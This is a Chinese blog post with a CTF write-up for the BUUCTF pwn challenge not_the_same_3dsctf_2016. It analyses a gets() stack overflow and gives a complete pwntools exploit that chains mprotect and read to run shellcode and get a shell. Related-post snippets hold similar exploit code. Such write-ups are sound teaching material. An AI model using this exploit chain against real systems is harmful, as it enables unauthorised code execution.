BUUCTF not_the_same_3dsctf_2016

已于 2022-10-31 15:30:21 修改
阅读量176 收藏 1
点赞数 2
分类专栏: Pwn 文章标签: c++ 开发语言
于 2022-10-31 13:19:39 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29912475/article/details/127613397
版权

本题目本地与远程得用两种方案打。

1.Checksec & IDA Pro

部分RELRO与栈不可执行。

在IDA中发现了 get_secret 函数

int get_secret()
{
  int v0; // esi

  v0 = fopen("flag.txt", &unk_80CF91B);
  fgets(&fl4g, 45, v0);
  return fclose(v0);
}

 main函数

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v4[45]; // [esp+Fh] [ebp-2Dh] BYREF

  printf((int)"b0r4 v3r s3 7u 4h o b1ch4o m3m0... ");
  gets(v4); //栈溢出漏洞
  return 0;
}

显而易见的栈溢出漏洞,会让人有惯性思维进行ret2text。但是事实并非如此。

如果使用 get_secret 函数打通了本地,会发现远程是打不通的。

再看一眼函数列表

mprotect 函数

原型:int mprotect(void *addr, size_t len, int prot)

addr 内存起始值

len 内存空间大小 

prot 内存权限

因此远程打通的思路是:

溢出 --> 给一段内存使用 mprotect 修改为可执行 --> shellcode

实际Payload:

mproctet_addr = elf.sym['mprotect']
read_addr = elf.sym['read']
pop = 0x804F420
	
mem_addr = 0x80EB000 # IDA Ctrl + S 查看 .got.plt 段起始地址并填入
mem_size = 0x1000    # 只要放得下 shellcode 就够用,设置大小无所谓
mem_type = 0x7       # 7 可执行权限

shellcode = asm(shellcraft.sh())
	
payload = ( b'A' * 0x2D ) + p32(mproctet_addr) + p32(pop) + p32(mem_addr) + p32(mem_size) + p32(mem_type)
payload += p32(read_addr) + p32(pop) + p32(0) + p32(mem_addr) + p32(len(shellcode)) + p32(mem_addr)

#溢出 --> 执行 mprotect 函数,使 .got.plt 段可执行 ,由于有3个参数,需要3个pop
#用 read 函数,写入 shellcode 到段中目标地址

完整PoC:

from pwn import *

elf = ELF("/root/Desktop/PwnSubjects/not_the_same_3dsctf_2016")
#io = remote("node4.buuoj.cn",29455)
io = process("/root/Desktop/PwnSubjects/not_the_same_3dsctf_2016")
	
mprotect_addr = elf.sym['mprotect']
read_addr = elf.sym['read']
pop = 0x804F420
	
mem_addr = 0x80EB000
mem_size = 0x1000
mem_type = 0x7

shellcode = asm(shellcraft.sh())
	
payload = ( b'A' * 0x2D ) + p32(mprotect_addr) + p32(pop) + p32(mem_addr) + p32(mem_size) + p32(mem_type)
payload += p32(read_addr) + p32(pop) + p32(0) + p32(mem_addr) + p32(len(shellcode)) + p32(mem_addr)

io.sendline(payload)
io.sendline(shellcode)
io.interactive()

成功获取shell

Red-Leaves
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vhe.rar_At the Same Time
09-23
Multi-threaded mode at the same time a number of tasks
buuctf——not_the_same_3dsctf_2016
qq_41560595的博客
03-26 414
这道题和前面分析过的get_started_3dsctf_2016差不多,换汤不换药。 选择一个地址0x080EB000,用来装shellcode。这个地址要改成可执行的。使用mprotect函数改变。 解题代码: from pwn import * #p=process("./not") p=remote("node3.buuoj.cn",29607) elf=ELF("./not") read=elf.symbols["read"] mprotect=elf.symbols["mprotect"] m
BUUCTF-not_the_same_3dsctf_2016
Fzuim的博客
03-03 1534
这是一道pwn题目IDA查看伪代码查看编译属性思路1,本地可打通,远程不行思路2,正确解法答案 IDA查看伪代码 main函数gets函数存在栈溢出攻击 通过查看字符串列表,发现有个get_secret读取flag.txt后门函数 查看编译属性 思路1,本地可打通,远程不行 也是最简单的,payload构造溢出返回到get_secret函数,并printf打印出fl4g,payload如下 #coding=utf8 from pwn import * context.log_level = 'deb
BUUCTF - PWN】not_the_same_3dsctf_2016
古月浪子的博客
03-27 1533
checksec一下,可以栈溢出 IDA打开看看,直接可以溢出 有一个后门函数,会把flag放在bss段上 程序有write函数,通过rop把flag打印出来 from pwn import * from LibcSearcher import * context.os='linux' context.arch='i386' context.log_level='debug' sl=la...
[BUUCTF]PWN14——not_the_same_3dsctf_2016
mcmuyanga的博客
08-29 1847
[BUUCTF]PWN14——not_the_same_3dsctf_2016 题目网址:https://buuoj.cn/challenges#not_the_same_3dsctf_2016 步骤: 例行检查,32位,开启了nx保护 nc一下看看程序大概的执行情况,没看出个所以然 32位ida载入,shift+f12查看程序里的字符串,发现flag.txt 双击跟进,ctrl+x找到调用这个字符串的函数,可以看到,这个函数将flag读了出来,存放到了unk_80F91B的位置,我们要想办法将这个地
[PWN] BUUCTF not_the_same_3dsctf_2016 1 Writeup
Csome
05-21 513
解题 checksec 先checksec一下,发现没有开canary方便了栈溢出,PIE也没开 反编译 IDA反编译 main函数 get_secret函数 分析利用 程序先进入main函数,有一个gets(无限长度的栈溢出) get_secret函数是将flag.txt读入bss段中,并没有做输出的操作 思路:,在main函数中修改main函数的返回地址,返回到get_secret函数中,读取flag,再返回到mian函数中(第二次进入main函数),修改返回地址为printf的地址,传入flag
find_same_class.zip_Same Same
09-20
找相同类,可以节约很多时间。方便各种类型。
Check_Same_File.rar_Same Same
09-14
简单的比较2个文件是否一样,从类型,文件大小开始比较,最后对比具体内容,可使用文件拖拉出文件名。
MATLAB3.rar_Same Same
09-24
same file contents as the priviously three already uploaded files
The-same-numbers.zip_Same Same
09-24
求s=a+aa+aaa+aaaa的值,其中a是一个数字。例如2+22+222+2222+22222(此时共有5个数相加)。
BUUCTFPWN】not_the_same_3dsctf_2016
m0_55368674的博客
01-12 317
BUUCTF - PWN】not_the_same_3dsctf_2016题解
BUUCTF-PWN-not_the_same_3dsctf_2016
Henlenl的博客
05-19 170
文章目录查看文件信息IDA静态分析exp 查看文件信息 开了个NX保护 IDA静态分析 开始看上去 其实就是利用gets()来溢出的 我们可以 shift+f12 查看字符串 可以看到 flag.txt 这个字符串 我们进去看一看…开始的思路其实是利用gets函数溢出来覆盖返回地址去读出flag,然后利用get_secret函数的输入点造成溢出覆盖返回地址到write函数的地址,打印出unk_80CF91B里面储存flag的内容,但是要知道的是,fgets函数其实是有保护机制的,所以我们利用这个是读
[BUUCTF-pwn]——not_the_same_3dsctf_2016
Y_peak的博客
02-10 713
not_the_same_3dsctf_2016 题目地址:https://buuoj.cn/challenges#not_the_same_3dsctf_2016 首先checksec一下,看看32位程序 在IDA中,发现栈溢出典型函数gets函数,这里注意这个main函数没有ebp shift+F12看下,发现了flag.txt这种敏感 字符串 找到调用的函数get_secret函数 函数调用后,flag储存在fl4g里面,我们找到fl4g的位置 找到可以输出的write函数 下面我们就可
buu not_the_same_3dsctf_2016
weixin_51298357的博客
01-30 183
buu not_the_same_3dsctf_2016 刚拿到题 刚打开的时候很懵,main函数里只有一个fopen函数和一个fgets函数,点半天也没查到什么。没有办法,shift+f12 :查看程序内的字符串,发现了flag.txt 双击跟进,ctrl+x找到调用这个字符串的函数,可以看到,这个函数将flag读了出来,存放到了unk_80F91B的位置。我们找到了flag的位置。接下来就要尝试把它读取出来就好了。 到这里,结合一开始看见的gets函数,得到了第一个思路:利用gets函数覆盖返回地址去
【CTF】not_the_same_3dsctf_2016
凉水的博客
01-30 3714
解题思路 1 先反编译,找到mian函数 undefined4 main(void) { char local_2d [45]; printf("b0r4 v3r s3 7u 4h o b1ch4o m3m0... "); gets(local_2d); return 0; } 一看到gets,就觉得靠谱了。 2 下一步找可利用函数,构造利用链。随便翻函数列表,没找到system以及/bin/sh,说明没有可以直接获取shell的方法;再继续翻,看到了get_secret函数,以及_
BUUCTF(pwn)not_the_same_3dsctf_2016
半岛铁盒的博客
03-28 211
from pwn import* p=remote('node3.buuoj.cn',29208) get_secret=0x80489a0 flag=0x80eca2d write=0x806e270 payload='a'*0x2d+p32(get_secret)+p32(write)+p32(0)+p32(1)+p32(flag)+p32(45) p.senline(payload) p.interactive() 有疑问的欢迎留言❄
buuctf not_the_same_3dsctf_2016
carol2358的博客
04-16 260
一开始没看到get_secret函数,去用mprotect去做了,结果报错卡住了。 思路是用write把get_serect写到bss里的flag显示出来,write bss就可以。 exp: from pwn import * from LibcSearcher import * context(log_level = 'debug',arch ='i386',os = 'linux'...
write_name_nets_same_as_ports
最新发布
07-28
在综合设计时,可以使用write_name_nets_same_as_ports命令来将网名与端口名保持一致。这个命令的作用是在生成的网表文件中,将每个信号的名称与其对应的端口名称相同。这样做的好处是可以提高设计的可读性和可维护...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值